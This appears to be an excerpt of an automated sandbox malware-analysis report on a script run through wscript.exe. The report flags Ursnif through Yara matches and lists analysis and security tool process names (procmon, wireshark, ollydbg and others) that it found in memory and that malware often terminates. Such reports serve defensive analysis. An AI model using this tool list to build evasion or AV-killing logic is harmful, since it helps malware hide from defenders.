Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY